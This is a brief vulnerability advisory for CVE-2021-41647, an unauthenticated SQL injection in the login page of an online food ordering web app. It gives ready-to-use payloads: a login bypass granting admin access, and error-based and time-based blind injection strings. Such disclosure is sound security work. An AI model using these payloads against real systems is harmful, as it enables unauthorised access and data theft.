Wednesday, October 6, 2021

Online-Food-Ordering-Web-App SQL Injection

CVE-2021-41647 SQL Injection in Online-Food-Ordering-Web-App

The Online-Food-Ordering-Web-App is vulnerable to un-authenticated error and time-based blind SQL Injection attacks. The username parameter on the /login.php page does not sanitize the user input, an attacker is able to bypass the login using a simple bypass technique.
Link To Application

Affected Components & Parameter

URL: /login.php
PARAMETER: username

To bypass the user login and gain full administrative access, payload in the username input field: user' or 1=1-- -

Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Discovered by

Jason Colyvas
September 20th, 2021

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore